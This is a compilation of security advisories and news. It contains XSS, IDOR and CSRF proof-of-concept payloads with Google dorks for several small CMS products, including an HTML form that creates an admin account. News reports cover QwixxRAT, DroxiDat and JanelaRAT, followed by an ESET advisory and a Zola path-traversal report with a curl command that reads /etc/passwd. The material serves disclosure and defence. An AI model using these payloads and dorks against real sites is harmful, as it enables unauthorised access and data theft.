Education Time Indonesian School CRM version 1.7 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Education Time Indonesian School CRM v 1.7 Xss Vulnerability                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : http://p30vel.ir                                                                                                   |  | # Dork      : "media.php?module=detailberita&id="                                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] use payload : /unit/spi/media.php?id=173%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/ramadan%20mubark/)%3C/ScRiPt%3E&module=detailberita/unit/spi/media.php?id=173%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(908942)%3C/ScRiPt%3E&module=detailberita[+] http://wwumpalangkarayaacid//unit/spi/media.php?id=173%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/ramadan%20mubark/)%3C/ScRiPt%3E&module=detailberita/unit/spi/media.php?id=173%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(908942)%3C/ScRiPt%3E&module=detailberitaGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Education Time Indonesian School CRM 1.7 Cross Site Scripting

Eden CMS version 1.02 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Eden CMS v1.02 Xss Vulnerability                                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : https://edendesign.be/fr/                                                                                          |  | # Dork      : intext:"Website by Eden Design"                                                                                    |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : artist.php?lang_id=1%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/indoushka/)%3C/ScRiPt%3E&post_id=352[+]  http://www/miniartextilit/artist.php?lang_id=1%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(/indoushka/)%3C/ScRiPt%3E&post_id=352        Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Eden CMS 1.02 Cross Site Scripting

Ecommerce Responsive version 1.2 suffers from an insecure direct object reference vulnerability.

    ====================================================================================================================================| # Title     : Ecommerce Responsive v1.2 Insecure Direct Object Reference Vulnerability                                           || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 62.0.3 (32-bit)                                            || # Vendor    : https://codecanyon.net/item/ecommerce-responsive-ecommerce-business-management-script/21413994                     |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] Any visitor can export and download a subscriber list .[+] use payload : /admin/subscriber-csv.php[+] https://www/demoslycom/xicia/cc/ecommerce/admin/subscriber-csv.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Ecommerce Responsive 1.2 Insecure Direct Object Reference

E-Biz CMS version 2.0 suffers from a cross site request forgery vulnerability.

====================================================================================================================================  
| # Title     : E-Biz CMS v2.0 CSRF Vulnerability                                                                                  |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               |   
| # Vendor    : https://softech.pk/                                                                                                |    
| # Dork      : Copyright © 2019, Designed By SOFTECH                                                                              |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin .

[+] Go to the line 17.

[+] Set the target site link Save changes and apply . 

[+] infected file : /add_user.php.

[+] http://127.0.0.1/q7.3/softpanel/add_user.php.

[+] save code as poc.html .

    <h1>Add User</h1>  
    </div>  
      
    <div class="site">  
      <div class="container">  
        <div class="grid-16">

                          <div class="widget" >  
            <div class="widget-header"> <span class="icon-wrench"></span>  
              <h3>Add User </h3>  
            </div>  
              
            <div class="widget-content">  
                
                
                
              <form action="http://aosccom/softpanel/add_user.php" method="post" enctype="multipart/form-data" name="" class="form uniformForm validateForm">  
                <table width="650" border="0" align="center" cellpadding="0" cellspacing="0">  
                  <tr>  
                    <td width="527" align="left"><strong>Name : </strong></td>  
                  </tr>  
                  <tr>  
                    <td><input name="name" value="" class="validate[required]" type="text" id="name" size="50"></td>  
                  </tr>  
                  <tr>  
                    <td><strong>Email :</strong> </td>  
                  </tr>  
                  <tr>  
                    <td><span class="field">  
                      <input name="email"  type="text" id="date"  class="validate[required,custom[email]" size="50" />  
                    </span></td>  
                  </tr>  
                  <tr>  
                    <td><strong>Password :</strong></td>  
                  </tr>  
                  <tr>  
                    <td><div class="field">  
                    <input name="password"  type="text" id="date_English" class="validate[required]" size="50" />          
                  </div> </td>  
                  </tr>  
                  <tr>  
                    <td><strong>Access : </strong></td>  
                  </tr>  
                  <tr>  
                    <td><select name="type" id="type" >  
                        <option value="user" selected="selected">User</option>  
                      <option value="admin">Admin</option>  
                    </select>                           </td>  
                  </tr>  
                  <tr id="link">  
                    <td><table width="100%" border="0" cellspacing="0" cellpadding="0">  
                        <tr>  
                          <td height="30"><strong id="">Privileges:</strong></td>  
                        </tr>  
                        <tr>  
                          <td align="center" valign="middle"><table width="400" border="0" align="center" cellpadding="0" cellspacing="0">

                                                        <tr>  
                              <td width="54%" height="25" align="left"><table width="150" border="0" cellspacing="0" cellpadding="0">  
                                <tr>  
                                  <td height="25"><label for="label">Company News</label></td>  
                                  <td width="10"><input type="checkbox" id="new" name="news" value="Y" onClick="news.value=(this.checked)?'Y':'N'"></td>  
                                </tr>                                <tr>  
                                  <td height="25">Home Banners</td>  
                                  <td><input type="checkbox" id="ban" name="banners" value="Y" onClick="banners.value=(this.checked)?'Y':'N'" ></td>  
                                </tr>                                 <tr>  
                                  <td height="25">Gallery</td>  
                                  <td><input type="checkbox" id="gal" name="gallery" value="Y"  onClick="gallery.value=(this.checked)?'Y':'N'"></td>  
                                </tr>                                <tr>  
                                  <td height="25"><label for="sim">Simple Gallery</label></td>  
                                  <td><input type="checkbox" id="gallery" name="simple_gallery" value="Y"  onClick="simple_gallery.value=(this.checked)?'Y':'N'"></td>  
                                </tr>                                                                                                                                                                                                                              <tr>  
                                  <td height="25">Pages</td>  
                                  <td><input name="pages" type="checkbox" id="pages"onClick="pages.value=(this.checked)?'Y':'N'" value="checkbox" checked></td>  
                                </tr>                                 <tr>  
                                  <td height="25">Newsletter</td>  
                                  <td><input name="newsletter" type="checkbox" id="newsletter"onClick="newsletter.value=(this.checked)?'Y':'N'" value="checkbox" checked></td>  
                                </tr>                                                                  <tr>  
                                  <td height="25">Categories</td>  
                                  <td><input name="categories" type="checkbox" id="categories" onClick="categories.value=(this.checked)?'Y':'N'" value="checkbox" checked></td>  
                                </tr>                                                             </table>                                </td>  
                            </tr>

                                                      </table>                            </td>  
                        </tr>  
                      </table></td>  
                  </tr>  
                  <tr>  
                    <td></td>  
                  </tr>  
                  <tr>  
                    <td></td>  
                  </tr>

                                                      <tr>  
                    <td>&nbsp;</td>  
                  </tr>  
                </table>  
                </td>  
                  </tr>  
                  <tr>  
                    <td></td>  
                  </tr>  
                  <tr>  
                    <td>&nbsp;</td>  
                  </tr>  
                  <tr>  
                    <td></td>  
                  </tr>  
                  <tr>  
                    <td>                                          </td>  
                  </tr>  
                  <tr>  
                    <td>&nbsp;</td>  
                  </tr>  
                  <tr>  
                    <td><button  name="save"class="btn btn-primary"><span class="icon-move-alt2"></span>Save</button>

  <button type="reset" class="btn btn-primary"><span class="icon-move-horizontal-alt2"></span>Cancel</button></td>  
                  </tr>  
                </table>  
              </form>  
            </div>

Greetings to :=================================================================  
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |  
===============================================================================

E-Biz CMS 2.0 Cross Site Request Forgery

EasyPX CMS version 06.02.04 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : EasyPX CMS V06.02.04 XSS Vulnerability                                                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            || # Vendor    : http://www.domphp.com/                                                                                             || # Dork      : Site fonctionnant sous Easy PX 41 CMOS 06.02.04 © 2004 - 2006 Freeware                                             |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This vulnerability affects : /tst/index.php    URL encoded POST input choixgalerie was set to 1" onmouseover=prompt(951655) bad="    The input is reflected inside a tag parameter between double quotes.    URL encoded POST input pg was set to system/fnc/readpg.php'"()&%<ScRiPt >prompt(940614)</ScRiPt>    URL encoded POST input pg was set to modules/login/inscription.php'"()&%<ScRiPt >prompt(904457)</ScRiPt>    URL encoded POST input pg_id was set to http://www.generation-libre.com/index2.php%3foption%3dcom_rss'"()&%<ScRiPt >prompt(920742)</ScRiPt>    URL encoded POST input pg_title was set to RSS'"()&%<ScRiPt >prompt(963497)</ScRiPt>Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

EasyPX CMS 06.02.04 Cross Site Scripting

A new remote access trojan (RAT) called QwixxRAT is being advertised for sale by its threat actor through Telegram and Discord platforms.
"Once installed on the victim's Windows platform machines, the RAT stealthily collects sensitive data, which is then sent to the attacker's Telegram bot, providing them with unauthorized access to the victim's sensitive information," Uptycs said in a new

A new remote access trojan (RAT) called **QwixxRAT** is being advertised for sale by its threat actor through Telegram and Discord platforms.

"Once installed on the victim's Windows platform machines, the RAT stealthily collects sensitive data, which is then sent to the attacker's Telegram bot, providing them with unauthorized access to the victim's sensitive information," Uptycs said in a new report published today.

The cybersecurity company, which discovered the malware earlier this month, said it's "meticulously designed" to harvest web browser histories, bookmarks, cookies, credit card information, keystrokes, screenshots, files matching certain extensions, and data from apps like Steam and Telegram.

The tool is offered for 150 rubles for weekly access and 500 rubles for a lifetime license. It also comes in a limited free version.

A C#-based binary, QwixxRAT comes with various anti-analysis features to remain covert and evade detection. This includes a sleep function to introduce a delay in the execution process as well as run checks to determine whether it's operating within a sandbox or virtual environment.

Other functions allow it to monitor for a specific list of processes (e.g., "taskmgr," "processhacker," "netstat," "netmon," "tcpview," and "wireshark"), and if detected, halts its own activity until the process is terminated.

Also incorporated in QwixxRAT is a clipper that stealthily accesses sensitive information copied to the device's clipboard with an aim to conduct illicit fund transfers from cryptocurrency wallets.

Command-and-control (C2) is facilitated by means of a Telegram bot, through which commands are sent to carry out additional data collection such as audio and webcam recordings and even remotely shutdown or restart the infected host.

The disclosure comes weeks after Cyberint disclosed details of two other RAT strains dubbed RevolutionRAT and Venom Control RAT that's also advertised on various Telegram channels with data exfiltration and C2 connectivity features.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

QwixxRAT: New Remote Access Trojan Emerges via Telegram and Discord

By Deeba Ahmed
Cybersecurity researchers at Securelist have discovered a cyberattack against a power-generating firm in South Africa. Reportedly, the firm…
This is a post from HackRead.com Read the original post: South African Power Supplier Hit by DroxiDat Malware

*   **Cybersecurity researchers uncover cyberattack targeting South African power-generating firm.**

*   **Attackers deploy new variant of SystemBC malware, named DroxiDot, with CobaltStrike beacons.**

*   **Speculation that attack could be an initial stage of a ransomware attack, occurring in March 2023.**

*   **DroxiDot variant is a compact 8kb payload, serves as a system profiler, and sets up SOCKS5 proxies on target computers.**

*   **Attacker’s C2 infrastructure linked to energy-oriented domain potentially tied to Russian ransomware group FIN12.**

Cybersecurity researchers at Securelist have discovered a cyberattack against a power-generating firm in South Africa. Reportedly, the firm was targeted with a new variant of the SystemBC malware and a yet unidentified hacking group carried out the attack.

It is worth noting that a variant of SystemBC was also identified in the 2021 cyber attack against Colonial Pipeline, a major American oil pipeline system. In the recent attack, however, attackers deployed the proxy-capable backdoor with CobaltStrike beacons.

According to Securelist, the new SystemBC malware variant is dubbed DroxiDat. Attackers used these tools to compromise systems and remotely access the electricity generator. However, researchers speculated that it could be the “initiate stage of a ransomware attack” that took place in the third or fourth week of March 2023.

For your information, SystemBC payload is a “changing, malicious” malware-as-a-service backdoor available on darknet forums since 2018. It is a C/C++-based commodity malware first observed in 2019.

“This platform is made up of three separate parts: on the server side, a C2 web server with admin panel and a C2 proxy listener; on the target side is a backdoor payload,” Securelist’s report revealed.

Compared to previously detected SystemBC variants that were around 15-30kb+, DroxiDot is a compact, 8kb variant that serves as a system profiler, and its main job is to set up SOCKS5 proxies on target computers so that attackers can tunnel malicious traffic.

The malware can also retrieve usernames, IP addresses, and machine names from an active device, encrypts the data, and transfers it to the attacker’s C2 server. This variant doesn’t feature many of SystemBC’s functionalities and acts as a system profiler to exfiltrate information to a remote server.

However, it doesn’t feature download or executing capabilities and can only connect with “remote listeners, pass data back and forth, and modify the system registry.”

This variant, however, allows attackers to simultaneously target multiple devices through automating tasks. If the credentials are legit, they can even deploy ransomware using built-in Windows tools without manually controlling the process.

 The attacker’s C2 infrastructure involved an energy-oriented domain “powersupportplancom,” which resolved to a suspicious IP host. Researchers believe this host was previously used in an APT activity to improve the attack’s potential.

Furthermore, researchers discovered that DroxiDot was used in another healthcare-related incident during the same time when it delivered Nokoyawa ransomware.

Regarding the attackers, researchers claim that evidence suggests the involvement of a Russian ransomware group, probably FIN12 (also known as Pistachio Tempest). This group is known for deploying SystemBC with Cobalt Strike Beacons to launch ransomware attacks against healthcare facilities in 2022.

**RELATED ARTICLES**

1.  Fake Tor Browser Installers Distributing Clipper Malware
2.  Big Head Ransomware Found in Fake Windows Updates
3.  SmugX: Chinese Hackers Targeting Embassies in Europe
4.  Hackers targeting embassies with trojanized TeamViewer
5.  Cyber-Partisans hit Belarus railroad system with ransomware
6.  New malware hides behind free VPN, pirated security software

South African Power Supplier Hit by DroxiDat Malware

Users in Latin America (LATAM) are the target of a financial malware called JanelaRAT that's capable of capturing sensitive information from compromised Microsoft Windows systems.
"JanelaRAT mainly targets financial and cryptocurrency data from LATAM bank and financial institutions," Zscaler ThreatLabz researchers Gaetano Pellegrino and Sudeep Singh said, adding it "abuses DLL side-loading

Users in Latin America (LATAM) are the target of a financial malware called **JanelaRAT** that's capable of capturing sensitive information from compromised Microsoft Windows systems.

"JanelaRAT mainly targets financial and cryptocurrency data from LATAM bank and financial institutions," Zscaler ThreatLabz researchers Gaetano Pellegrino and Sudeep Singh said, adding it "abuses DLL side-loading techniques from legitimate sources (like VMWare and Microsoft) to evade endpoint detection."

The exact starting point of the infection chain is unclear, but the cybersecurity company, which discovered the campaign in June 2023, said the unknown vector is used to deliver a ZIP archive file containing a Visual Basic Script.

The VBScript is engineered to fetch a second ZIP archive from the attackers' server as well as drop a batch file used to establish persistence of the malware.

The ZIP archive is packed with two components, the JanelaRAT payload and a legitimate executable -- identity\_helper.exe or vmnat.exe -- that's used to launch the former by means of DLL side-loading.

JanelaRAT, for its part, employs string encryption and transitions into an idle state when necessary to avoid analysis and detection. It's also a heavily modified variant of BX RAT, which was first discovered in 2014.

One of the new additions to the trojan is its ability to capture windows titles and send them to the threat actors, but not before registering the newly-infected host with the command-and-control (C2) server. Other features of JanelaRAT allow it to track mouse inputs, log keystrokes, take screenshots, and harvest system metadata.

"JanelaRAT ships with just a subset of the features offered by BX RAT," the researchers said. "The JanelaRAT developer didn't import shell commands execution functionality, or files and processes manipulation functionalities."

A closer analysis of the source code has revealed the presence of several strings in Portuguese, indicating that the author is familiar with the language.

The links to LATAM come from references to organizations operating in the banking and decentralized finance verticals and the fact that the VBScript uploads to VirusTotal originated from Chile, Colombia, and Mexico.

"The usage of original or modified commodity Remote Access Trojans (RATs) is common among threat actors operating in the LATAM region," the researchers said. "JanelaRAT's focus on harvesting LATAM financial data and its method of extracting window titles for transmission underscores its targeted and stealthy nature."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Financial Malware 'JanelaRAT' Targets Latin American Users


The vulnerability potentially allows an attacker to misuse ESET’s file operations during the module update to delete or move files without having proper permissions.

ESET Customer Advisory 2023-0008

August 11, 2023

Severity: Medium

**Summary**

A report of a local privilege escalation vulnerability was submitted to ESET by the Zero Day Initiative (ZDI). The vulnerability potentially allowed an attacker to misuse ESET’s file operations during a module update to delete or move files without having proper permissions to do so.

ESET fixed the issue with HIPS support module 1463, which was distributed automatically to ESET customers along with Detection engine updates. No action stemming from this vulnerability report is required to be taken by our customers.

**Details**

The vulnerability allows a user logged on to the system to perform a privilege escalation attack, misusing the ESET GUI to plant malicious files required for the attack into specific folders and later misusing file operations performed by ESET’s updater component to possibly delete or move any arbitrary file.

To the best of our knowledge, there are no existing exploits that take advantage of this vulnerability in the wild.

The CVE ID reserved for this vulnerability is CVE-2023-3160, with the following CVSS v3.1 score and vector:

7.8: AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

**Solution**

ESET released an update with HIPS support module 1463 to patch this vulnerability in already installed products, which was distributed automatically. The distribution of the module update started on June 26 for pre-release users, followed by batches for general public users from June 28, with a full release on July 5. See the instructions how to check the versions of the modules.

As already installed products are patched by the HIPS support module update, customers with an ESET product installed and regularly updated do not need to take any action stemming from this vulnerability report.

For new installations, we recommend using the latest installers downloaded from www.eset.com or the ESET repository.

**Affected ESET products**

*   ESET NOD32 Antivirus, ESET Internet Security, ESET Smart Security Premium
*   ESET Endpoint Antivirus and ESET Endpoint Security
*   ESET Server Security for Windows Server (File Security), ESET Mail Security for Microsoft Exchange Server, ESET Mail Security for IBM Domino, ESET Security for Microsoft SharePoint Server

**Feedback & Support**

If you have feedback or questions about this issue, contact us using the ESET Security Forum, or via local ESET Technical Support.

**Acknowledgment**

ESET values the principles of coordinated disclosure within the security industry and would like to express our thanks to Trend Micro’s Zero Day Initiative team.

**Version log**

Version 1.0 (August 11, 2023): Initial version of this document

CVE-2023-3160: [CA8466] ESET Customer Advisory: Local privilege escalation vulnerability fixed in ESET security products for Windows

An issue was discovered in zola 0.13.0 through 0.17.2. The custom implementation of a web server, available via the "zola serve" command, allows directory traversal. The handle_request function, used by the server to process HTTP requests, does not account for sequences of special path control characters (../) in the URL when serving a file, which allows one to escape the webroot of the server and read arbitrary files from the filesystem.

**Bug Report****Environment**

OS: MacOS 13.4.1; Windows 11; Ubuntu 20.04  
Zola version: 0.17.2

**Expected Behavior**

Application should only search & serve files within the webserver's root folder.

**Current Behavior**

Custom implementation of a web server, used for development purposes & available via zola serve command is vulnerable to a directory traversal. handle_request function performs insufficient checks over the user-supplied path in a HTTP request to the server

if !root.starts\_with(original\_root) {

The application only checks for a trusted path prefix, but does not actually fully resolve the path. Since the webroot directory is prepended to each path, this check will always be bypassed:

    let root_path = PathBuf::from("/trusted_prefix/../../some/arbitrary/path");
    let trusted_prefix = "/trusted_prefix";
    
    root_path.starts_with(trusted_prefix); <-- true
    

Thus is possible to utilize path control sequences (/, ..) to escape the webroot & read arbitrary files off the FS of the machines running zola serve command.

**Step to reproduce (UNIX)**

0.  Install zola
1.  Run zola init poc && cd poc
2.  Run zola serve
3.  Use curl > 7.42 to trigger the path traversal via the following command: curl --path-as-is "http://localhost:1111/../../../../../../../../../../etc/passwd" -vvv

Successful explotation should yield contents of the /etc/passwd file

Tag

#windows